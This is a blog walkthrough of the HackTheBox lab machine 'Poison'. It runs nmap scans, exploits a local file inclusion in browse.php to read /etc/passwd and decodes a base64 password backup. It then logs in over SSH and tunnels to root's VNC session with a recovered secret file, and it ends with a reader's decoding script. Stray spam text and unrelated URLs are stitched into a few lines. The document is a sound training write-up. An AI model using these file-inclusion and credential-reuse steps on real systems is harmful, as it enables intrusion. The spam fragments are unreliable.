Poison – Hackthebox

Lubuklinggau Skills Required
Basic knowledge of Linux
Enumerating ports and services
Basic understanding of cryptography

http://trisporttrophies.com/home Skills Learned
SSH Tunneling
VNCViewer commands
Grep -vE to select non-matching lines

START

Initial port scan

[root:~/Desktop/poison]# nmap -p- 10.10.10.84 -oA portscan

Starting Nmap 7.70 ( https://nmap.org ) at 2018-04-09 15:11 BST

Nmap scan report for 10.10.10.84

Host is up, received echo-reply ttl 63 (0.035s latency).

Not shown: 54531 filtered ports, 10999 closed ports

Reason: 54531 no-responses and 10999 resets

Some closed ports may be reported as filtered due to --defeat-rst-ratelimit

PORT STATE SERVICE REASON

22/tcp open ssh syn-ack ttl 63

80/tcp open http syn-ack ttl 63

5802/tcp open vnc-http-2 syn-ack ttl 63

5902/tcp open vnc-2 syn-ack ttl 63

6002/tcp open X11:2 syn-ack ttl 63

Enum Ports

[root:~/Desktop/poison]# nmap -sC -sV -p 22,80,5802,5902,6002 10.10.10.84 -oA enumports

Starting Nmap 7.70 ( https://nmap.org ) at 2018-04-09 15:13 BST

Nmap scan report for 10.10.10.84

Host is up, received echo-reply ttl 63 (0.033s latency).

PORT STATE SERVICE REASON VERSION

22/tcp open ssh syn-ack ttl 63 OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)

| ssh-hostkey: 

| 2048 e3:3b:7d:3c:8f:4b:8c:f9:cd:7f:d2:3a:ce:2d:ff:bb (RSA)

| 256 4c:e8:c6:02:bd:fc:83:ff:c9:80:01:54:7d:22:81:72 (ECDSA)

|_ 256 0b:8f:d5:71:85:90:13:85:61:8b:eb:34:13:5f:94:3b (ED25519)

80/tcp open http syn-ack ttl 63 Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)

|_http-server-header: Apache/2.4.29 (FreeBSD) PHP/5.6.32

https://wordpress.com/post/offsecnewbie.wordpress.com/32|_http-title: Site doesn't have a title (text/html; charset=UTF-8).

5802/tcp open http syn-ack ttl 63 Bacula http config

5902/tcp open vnc syn-ack ttl 63 VNC (protocol 3.8)

| vnc-info: 

| Protocol version: 3.8

| Security types: 

| VNC Authentication (2)

| Tight (16)

| Tight auth subtypes: 

|_ STDV VNCAUTH_ (2)

6002/tcp open X11 syn-ack ttl 63 (access denied)

Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 24.27 seconds

nmap http enum

[root:~/Desktop/poison]# nmap -Pn -p 80 --script http-enum 10.10.10.84

Starting Nmap 7.70 ( https://nmap.org ) at 2018-04-09 15:15 BST

Nmap scan report for 10.10.10.84

Host is up, received user-set (0.032s latency).

PORT STATE SERVICE REASON

80/tcp open http syn-ack ttl 63

| http-enum: 

| /info.php: Possible information file

|_ /phpinfo.php: Possible information file

Nmap done: 1 IP address (1 host up) scanned in 3.42 seconds

Here is what we can see from the website.

poison port 80I entered testscript.php in the field and i got an error:

  http://bestmove.uk.net/wp-json/oembed/1.0/embed?url=https://bestmove.uk.net/property/ivybank-crescent-gourock/ Warning: include(testscript.php): failed to open stream: No such file or directory in  600 mg neurontin /usr/local/www/apache24/data/browse.php on line   2
 Warning: include(): Failed opening 'testscript.php' for inclusion (include_path='.:/usr/local/www/apache24/data') in /usr/local/www/apache24/data/browse.php on line 2

Now to search for possible LFI

[root:~/Desktop/poison]# fimap -u "http://10.10.10.84/browse.php?file=" [2/1957]

fimap v.1.00_svn (My life for Aiur) 

:: Automatic LFI/RFI scanner and exploiter 

:: by Iman Karim (fimap.dev@gmail.com)

SingleScan is testing URL: 'http://10.10.10.84/browse.php?file='

[14:53:52] [OUT] Inspecting URL 'http://10.10.10.84/browse.php?file='...

[14:53:52] [INFO] Fiddling around with URL...

[14:53:52] [OUT] [PHP] Possible file inclusion found! -> 'http://10.10.10.84/browse.php?file=z2hu63pz' with Parameter 'file'.

[14:53:52] [OUT] [PHP] Identifying Vulnerability 'http://10.10.10.84/browse.php?file=' with Parameter 'file'...

[14:53:53] [INFO] Scriptpath received: '/usr/local/www/apache24/data'

[14:53:53] [INFO] Operating System is 'Unix-Like'.

[14:53:53] [INFO] Testing file '/etc/passwd'...

[14:53:53] [INFO] Testing file '/proc/self/environ'...

[14:53:53] [INFO] Testing file 'php://input'...

....

....

########################################################

#[1] Possible PHP-File Inclusion #

########################################################

#::REQUEST #

# [URL] http://10.10.10.84/browse.php?file= #

# [HEAD SENT] #

#::VULN INFO #

# [GET PARAM] file #

# [PATH] /usr/local/www/apache24/data #

# [OS] Unix #

# [TYPE] Absolute Clean #

# [TRUNCATION] No Need. It's clean. #

# [READABLE FILES] #

# [0] /etc/passwd #

########################################################

Got access to the /etc/passwd file

[root:~/Desktop/poison]# curl -s http://10.10.10.84/browse.php\?file\=/etc/passwd

root:*:0:0:Charlie &:/root:/bin/csh

toor:*:0:0:Bourne-again Superuser:/root:

daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin

operator:*:2:5:System &:/:/usr/sbin/nologin

bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin

tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin

kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin

games:*:7:13:Games pseudo-user:/:/usr/sbin/nologin

news:*:8:8:News Subsystem:/:/usr/sbin/nologin

man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin

sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin

smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin

mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin

bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin

unbound:*:59:59:Unbound DNS Resolver:/var/unbound:/usr/sbin/nologin

proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin

_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin

_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin

uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico

pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin

auditdistd:*:78:77:Auditdistd unprivileged user:/var/empty:/usr/sbin/nologin

www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin

_ypldap:*:160:160:YP LDAP unprivileged user:/var/empty:/usr/sbin/nologin

hast:*:845:845:HAST unprivileged user:/var/empty:/usr/sbin/nologin

nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin

_tss:*:601:601:TrouSerS user:/var/empty:/usr/sbin/nologin

messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/usr/sbin/nologin

avahi:*:558:558:Avahi Daemon User:/nonexistent:/usr/sbin/nologin

cups:*:193:193:Cups Owner:/nonexistent:/usr/sbin/nologin

charix:*:1001:1001:charix:/home/charix:/bin/csh

I copied that to a file called passwdfile then did an inverted grep search of that file pulling out the users that have login abilities. I must remember that command in future its very useful!

[root:~/Desktop/poison]# nano passwdfile

[root:~/Desktop/poison]# grep -vE nologin passwdfile 

root:*:0:0:Charlie &:/root:/bin/csh

toor:*:0:0:Bourne-again Superuser:/root:

uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico

charix:*:1001:1001:charix:/home/charix:/bin/csh

So we have 4 users will login abilities: root, a user toor with superuser access, uucp – no clue what this user has and what looks like a started user charix. Lets save them off to a file users. I tried sshing some of those users with a few random passwords – no luck (didn’t expect anything but no harm in trying!)

Okay looking at the main webpage again I added the file names to see if i can access them

 ini.php, info.php, listfiles.php, phpinfo.php

listfiles.php gave me

Array

(

    [0] => .

    [1] => ..

    [2] => browse.php

    [3] => index.php

    [4] => info.php

    [5] => ini.php

    [6] => listfiles.php

    [7] => phpinfo.php

    [8] => pwdbackup.txt

)

I think i nearly broke the keyboard with excitement typing pwdbackup.txt in the to web address bar! We’re getting somewhere!

This password is secure, it's encoded atleast 13 times.. what could go wrong really..

Vm0wd2QyUXlVWGxWV0d4WFlURndVRlpzWkZOalJsWjBUVlpPV0ZKc2JETlhhMk0xVmpKS1IySkVU

bGhoTVVwVVZtcEdZV015U2tWVQpiR2hvVFZWd1ZWWnRjRWRUTWxKSVZtdGtXQXBpUm5CUFdWZDBS

bVZHV25SalJYUlVUVlUxU1ZadGRGZFZaM0JwVmxad1dWWnRNVFJqCk1EQjRXa1prWVZKR1NsVlVW

M040VGtaa2NtRkdaR2hWV0VKVVdXeGFTMVZHWkZoTlZGSlRDazFFUWpSV01qVlRZVEZLYzJOSVRs

WmkKV0doNlZHeGFZVk5IVWtsVWJXaFdWMFZLVlZkWGVHRlRNbEY0VjI1U2ExSXdXbUZEYkZwelYy

eG9XR0V4Y0hKWFZscExVakZPZEZKcwpaR2dLWVRCWk1GWkhkR0ZaVms1R1RsWmtZVkl5YUZkV01G

WkxWbFprV0dWSFJsUk5WbkJZVmpKMGExWnRSWHBWYmtKRVlYcEdlVmxyClVsTldNREZ4Vm10NFYw

MXVUak5hVm1SSFVqRldjd3BqUjJ0TFZXMDFRMkl4WkhOYVJGSlhUV3hLUjFSc1dtdFpWa2w1WVVa

T1YwMUcKV2t4V2JGcHJWMGRXU0dSSGJFNWlSWEEyVmpKMFlXRXhXblJTV0hCV1ltczFSVmxzVm5k

WFJsbDVDbVJIT1ZkTlJFWjRWbTEwTkZkRwpXbk5qUlhoV1lXdGFVRmw2UmxkamQzQlhZa2RPVEZk

WGRHOVJiVlp6VjI1U2FsSlhVbGRVVmxwelRrWlplVTVWT1ZwV2EydzFXVlZhCmExWXdNVWNLVjJ0

NFYySkdjR2hhUlZWNFZsWkdkR1JGTldoTmJtTjNWbXBLTUdJeFVYaGlSbVJWWVRKb1YxbHJWVEZT

Vm14elZteHcKVG1KR2NEQkRiVlpJVDFaa2FWWllRa3BYVmxadlpERlpkd3BOV0VaVFlrZG9hRlZz

WkZOWFJsWnhVbXM1YW1RelFtaFZiVEZQVkVaawpXR1ZHV210TmJFWTBWakowVjFVeVNraFZiRnBW

VmpOU00xcFhlRmRYUjFaSFdrWldhVkpZUW1GV2EyUXdDazVHU2tkalJGbExWRlZTCmMxSkdjRFpO

Ukd4RVdub3dPVU5uUFQwSwo=

I went to https://codebeautify.org/base64-decode and input the code. I copied the code from the several times from the decoded and pasted into the coded section ( probably 13 as the previous web page suggested ) and got something that looked like the password for user charix

The password is 

Charix!2#4%6&8(0

I ssh'd in using that password

[root:~/Desktop/poison]# ssh charix@10.10.10.84

Password for charix@Poison:

Last login: Mon Apr 9 15:44:16 2018 from :2

FreeBSD 11.1-RELEASE (GENERIC) #0 r321309: Fri Jul 21 02:08:28 UTC 2017

Welcome to FreeBSD!

........

........

Edit /etc/motd to change this login announcement.

Want to go the directory you were just in?

Type "cd -"

charix@Poison:~ % ls -l │

total 44 │

-rw-r----- 1 root charix 166 Mar 19 16:35 secret.zip │

-rw-r----- 1 root charix 33 Mar 19 16:11 user.txt │

charix@Poison:~ % cat user.txt │

eaacdfb2d141b72a589233063604209c

I copied lineenum.py on my kali box and started a webserver so i could download it using wget from the Poison machine.

wget

I tried to run it but got an error Command not found.

charix@Poison:~ % ./linenum.sh 

./linenum.sh: Command not found. 

carix@Poison:~ %

Not sure whats going on there. Not deterred I downloaded the secret.zip file to kali machine using Python’s SimpleHTTPServer.

[root:~/Desktop/poison]# unzip secret.zip 

COPYRIGHT entropy libexec proc sys │Archive: secret.zip

bin etc media rescue tmp │[secret.zip] secret password:

I unzipped secret.zip using the charix password – password re-usage ftw and got a file called secret. It had strange characters inside it:

[root:~/Desktop/poison]# cat secret

[|Ֆz!# 

[root:~/Desktop/poison]#

After sometime (read 2 days) i finally started to make progress. I ran the top command as user Charix and noticed Xvnc was running

last pid: 88296; load averages: 1.60, 1.67, 1.77 up 1+17:28:06 16:39:27

38 processes: 2 running, 36 sleeping

CPU: 7.1% user, 0.0% nice, 92.5% system, 0.4% interrupt, 0.0% idle

Mem: 4412K Active, 685M Inact, 36M Laundry, 196M Wired, 66M Buf, 44M Free

Swap: 1024M Total, 1492K Used, 1022M Free

Number of processes to show: 

 PID USERNAME THR PRI NICE SIZE RES STATE TIME WCPU COMMAND

 2962 charix 1 103 0 22692K 6648K RUN 23.1H 99.78% Xvnc

 543 root 2 20 0 56320K 3444K select 4:03 0.06% vmtoolsd

88296 charix 1 20 0 20160K 3120K RUN 0:00 0.05% top

 319 root 1 20 0 9560K 3040K select 0:12 0.01% devd

21364 charix 1 20 0 85228K 7388K select 0:01 0.01% sshd

 642 root 1 20 0 20636K 3540K select 0:05 0.01% sendmail

 390 root 1 20 0 10500K 1920K select 0:06 0.00% syslogd

 625 root 1 20 0 99172K 6068K select 0:08 0.00% httpd

 3092 www 1 20 0 99M 7164K lockf 0:02 0.00% httpd

 649 root 1 20 0 12592K 1864K nanslp 0:01 0.00% cron

 3076 www 1 20 0 99M 7260K lockf 0:01 0.00% httpd

On my kali machine i ran:

vncviewer 10.10.10.84:5902

Connected to RFB server, using protocol version 3.8

Enabling TightVNC protocol extensions

Performing standard VNC authentication

Password:

Authentication successful

Desktop name "charix's X desktop (Poison:2)"

I used Charix’s ssh password: Charix!2#4%6&8(0

desktop

I can see there are 2 sessions one for root and one for the user charix. Im struggling to find a way to connect to the root session

charix@Poison:/usr/local/sbin % ps aux | grep vnc

charix 2962 100.0 0.8 24740 8084 1- R Mon15 2584:59.86 Xvnc :2 -desktop X -httpd /usr/local/share/tightvnc/classes -auth /home/charix/.Xauthority -geometry 1024x768 -depth 24 -rfbwait 120000 -rfb

root 529 0.0 0.7 23608 7456 v0- I Sun23 0:00.83 Xvnc :1 -desktop X -httpd /usr/local/share/tightvnc/classes -auth /root/.Xauthority -geometry 1280x800 -depth 24 -rfbwait 120000 -rfbauth /r

charix 91126 0.0 0.0 412 316 0 R+ 13:13 0:00.00 grep vnc

charix@Poison:/usr/local/sbin %

I know that i have to use the secret file I unzipped from the secret.zip file but no idea on how to use it.

I restarted the box out of desperation and started a port scan. This time only 2 ports were open

[root:~/Desktop/poison]# nmap -p- 10.10.10.84 

Starting Nmap 7.70 ( https://nmap.org ) at 2018-04-11 14:44 BST

Nmap scan report for 10.10.10.84

Host is up, received echo-reply ttl 63 (0.029s latency).

Not shown: 54549 filtered ports, 10984 closed ports

Reason: 54549 no-responses and 10984 resets

Some closed ports may be reported as filtered due to --defeat-rst-ratelimit

PORT STATE SERVICE REASON

22/tcp open ssh syn-ack ttl 63

80/tcp open http syn-ack ttl 63

Nmap done: 1 IP address (1 host up) scanned in 55.50 seconds

Okay so i figured i need to use vncviewer to log on to the root’s vnc account using the secret password. I couldnt do this from charix ssh as I got this error:

charix@Poison:~ % vncviewer

vncviewer: Command not found.

charix@Poison:~ %

I needed to use tunneling of some sort. I found this blog and browsed to Local Port Forwarding.

ssh sshserver -L <local port to listen>:<remote host>:<remote port>
ssh -L 5901:localhost:5901 charix@10.10.10.84

I am linking the port 5901 on my machine to port 5901 on the machine I want to tunnel to. I am logging in as charix through ssh. So if a service connects to port 5901 on my machine it will be redirected to ssh  to 10.10.10.84 using charix’s username

On my kali machine i ran this command using the secret i got earlier.

[root:~/Desktop/poison]# vncviewer localhost:5901 -passwd secret

Connected to RFB server, using protocol version 3.8

Enabling TightVNC protocol extensions

Performing standard VNC authentication

Authentication successful

Desktop name "root's X desktop (Poison:1)"

VNC server default format:

 32 bits per pixel.

 Least significant byte first in each pixel.

 True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0

Using default colormap which is TrueColor. Pixel format:

 32 bits per pixel.

 Least significant byte first in each pixel.

 True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0

Same machine: preferring raw encoding

root!

I managed to get in as root. It wasn’t easy to copy the password so I started a python http server to get the flag.

rootflag

716d04b188419cf2bb99d891272361f5

FIN

CONCLUSION
This was tough. I got the user flag without any major difficulties / me throwing tantrums but the root flag had me beat. I knew of ssh tunneling but never used it before. What I think has thrown me off was the fact that there were ports open previously when I was attacking machine and could vnc as charix without any issues. Someone on the htb group said there should only be 2 and I should restart the box. I did this and as you read only 2 ports came up. I think then after I did the ps aux | grep vnc I would see that root vnc was running. Also I did a socket -l to view ports.

rowbot

Share

4 Responses

  1. Hi i suggest to automate the base64 decode process, i’ve created this script
    #!/bin/bash

    cat pwdbackup.txt | base64 -d > decoded
    while [ $? -eq 0 ]; do
    mv decoded still_decoded
    cat still_decoded | base64 -d > decoded
    done
    mv still_decoded decoded.txt

    The output will be in decoded.txt.
    I hope this is useful.

Leave a Reply

Your email address will not be published. Required fields are marked *

Post comment

This site uses Akismet to reduce spam. Learn how your comment data is processed.